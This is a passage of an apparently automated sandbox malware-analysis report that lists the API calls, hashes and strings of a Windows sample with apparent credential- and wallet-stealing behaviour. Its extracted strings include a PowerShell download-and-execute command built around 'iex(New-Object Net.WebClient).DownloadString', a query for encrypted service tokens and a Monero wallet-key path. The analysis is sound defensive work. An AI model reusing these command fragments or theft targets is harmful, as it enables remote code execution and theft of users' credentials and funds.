                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              • lstrlen.KERNEL32(00000000), ref: 0079BC9F
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0079BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0079BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0079BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: cf8085893f76ef26a52c5dc23d55631c66cfda675da7dcbb664b257638aa3b36
                              • Instruction ID: 34e9cf0b98c1718954fe85d75f86e006e4fe06ad729448831d4e66514bc8215f
                              • Opcode Fuzzy Hash: cf8085893f76ef26a52c5dc23d55631c66cfda675da7dcbb664b257638aa3b36
                              • Instruction Fuzzy Hash: 69B10271910108EBDF45FBA0DD9AEEE7378AF95300F404269F507A6091EF3C6A59CB62
                              Function 007A6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 7bec4dc56ac6408a3ef0d3661dd6f5306750947221898a061f328fd92f948282
                              • Instruction ID: ec17b857496cc4d993824b899281c98d0276dd52cca76cdb166ae6607205c2b0
                              • Opcode Fuzzy Hash: 7bec4dc56ac6408a3ef0d3661dd6f5306750947221898a061f328fd92f948282
                              • Instruction Fuzzy Hash: 0FF08931DAE209EFD3449FE0E90972C7B70FB05703F04019AF60586290D6744BA1EF96
                              Function 00794FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00794FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00794FD1
                              • InternetOpenA.WININET(007B0DDF,00000000,00000000,00000000,00000000), ref: 00794FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00795011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00795041
                              • InternetCloseHandle.WININET(?), ref: 007950B9
                              • InternetCloseHandle.WININET(?), ref: 007950C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 77697674ddb4ca14f0d4d94ad744952638e38f9ecc7b184f8a94376d2f89c963
                              • Instruction ID: b7c4307c517af03a534b923109c13c47dff56c115926a8d19076059f898ab107
                              • Opcode Fuzzy Hash: 77697674ddb4ca14f0d4d94ad744952638e38f9ecc7b184f8a94376d2f89c963
                              • Instruction Fuzzy Hash: F83116B4A41218ABDB20CF64DC85BDCB7B4EB48704F1081D9FA09A7281C7746EC59F99
                              Function 007A83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007A8426
                              • wsprintfA.USER32 ref: 007A8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007A847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A8499
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,014CDF20,00000000,000F003F,?,00000400), ref: 007A84EC
                              • lstrlen.KERNEL32(?), ref: 007A8501
                              • RegQueryValueExA.ADVAPI32(00000000,014CDE48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,007B0B34), ref: 007A8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 198068c8c455cf63ba0cd7dfbc0ec8266fe2cf0d134dc350115015b9846f6c94
                              • Instruction ID: 72c2f8ab7bda319e0735cd6886a11f0526856de48302e25bd48b0e154df2429e
                              • Opcode Fuzzy Hash: 198068c8c455cf63ba0cd7dfbc0ec8266fe2cf0d134dc350115015b9846f6c94
                              • Instruction Fuzzy Hash: 962139B1950218ABDB64DB54DC85FE9B3B8FB88700F00C2D9E609A6140DF75AAC1CFD5
                              Function 007A7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,014BC428,00000000,00020119,00000000), ref: 007A76DD
                              • RegQueryValueExA.ADVAPI32(00000000,014CDFE0,00000000,00000000,?,000000FF), ref: 007A76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: f48abbb601915049f5191c6298fbb505435176ba9aa307e6fe9c852176f38ef1
                              • Instruction ID: 5ffbf04a756f40f4bd7a3ab9a857190c4519867749991aeb16f8180ea1b8000c
                              • Opcode Fuzzy Hash: f48abbb601915049f5191c6298fbb505435176ba9aa307e6fe9c852176f38ef1
                              • Instruction Fuzzy Hash: EC018FB4A98204BBD700DBE0DC49FAAB7B8EB48701F004155FA0497290D6749950EB51
                              Function 007A7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A773B
                              • RegOpenKeyExA.ADVAPI32(80000002,014BC428,00000000,00020119,007A76B9), ref: 007A775B
                              • RegQueryValueExA.ADVAPI32(007A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 007A777A
                              • RegCloseKey.ADVAPI32(007A76B9), ref: 007A7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 5c80f2d61dc42a4ba7ab2119051af2a767caebb87190277cbaf09165f01990c0
                              • Instruction ID: fb6c5920ad5c482144e98e00ca83478af237afcbe6f5f96a8bd11e22ac2c5401
                              • Opcode Fuzzy Hash: 5c80f2d61dc42a4ba7ab2119051af2a767caebb87190277cbaf09165f01990c0
                              • Instruction Fuzzy Hash: CA0167B5E54308BBD700DFE0DC49FAEB7B8EB44701F004555FA05A7281D6745550DB91
                              Function 007A92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(:z,80000000,00000003,00000000,00000003,00000080,00000000,?,007A3AEE,?), ref: 007A92FC
                              • GetFileSizeEx.KERNEL32(000000FF,:z), ref: 007A9319
                              • CloseHandle.KERNEL32(000000FF), ref: 007A9327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :z$:z
                              • API String ID: 1378416451-1860088793
                              • Opcode ID: 52fa038433ba38c1bcb09c795380c9cb4eb27579b112fceda5f31f7538526942
                              • Instruction ID: 87ac6d04a0507a0615a9bc00c7c04121a6e5dd197e1ed87b686a66ff69cefc31
                              • Opcode Fuzzy Hash: 52fa038433ba38c1bcb09c795380c9cb4eb27579b112fceda5f31f7538526942
                              • Instruction Fuzzy Hash: 16F04F35E55208FBDF10DFB0DC49F9E77B9AB88711F10C294B651A72C0DA7496519B40
                              Function 007999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                              • LocalFree.KERNEL32(0079148F), ref: 00799A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 68b46443713682b4e67c5a6cf7f725524ae9508c4f33233f998b164248fb0135
                              • Instruction ID: 29016bfb4a84bd888b0913371d086b782533955eb9b3385d7dc58bbf5214d963
                              • Opcode Fuzzy Hash: 68b46443713682b4e67c5a6cf7f725524ae9508c4f33233f998b164248fb0135
                              • Instruction Fuzzy Hash: 013128B4A01209EFEF14CF94D985BAE77F5FF48340F108158E901A7290D778AA91DFA1
                              Function 007A4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,014CE160), ref: 007A47DB
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4801
                              • lstrcat.KERNEL32(?,?), ref: 007A4820
                              • lstrcat.KERNEL32(?,?), ref: 007A4834
                              • lstrcat.KERNEL32(?,014BB980), ref: 007A4847
                              • lstrcat.KERNEL32(?,?), ref: 007A485B
                              • lstrcat.KERNEL32(?,014CD760), ref: 007A486F
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007A8D90: GetFileAttributesA.KERNEL32(00000000,?,00791B54,?,?,007B564C,?,?,007B0E1F), ref: 007A8D9F
                                • Part of subcall function 007A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007A4580
                                • Part of subcall function 007A4570: RtlAllocateHeap.NTDLL(00000000), ref: 007A4587
                                • Part of subcall function 007A4570: wsprintfA.USER32 ref: 007A45A6
                                • Part of subcall function 007A4570: FindFirstFileA.KERNEL32(?,?), ref: 007A45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 702108ba3c4b7c35502d4b15750fc3ac88b0636ee58dca3b29ab4358cdb2ffa3
                              • Instruction ID: 0f7bef20667f06c114ab76cd66b2d436eb414ac38b8b105218312a2d8528f354
                              • Opcode Fuzzy Hash: 702108ba3c4b7c35502d4b15750fc3ac88b0636ee58dca3b29ab4358cdb2ffa3
                              • Instruction Fuzzy Hash: A23187B6D50208A7CB50F7B0DC89EEE737CAB88700F404689B71556091DE78ABC9DB96
                              Function 007A2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A2D85
                              Strings
                              • ')", xrefs: 007A2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 007A2CC4
                              • <, xrefs: 007A2D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 007A2D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
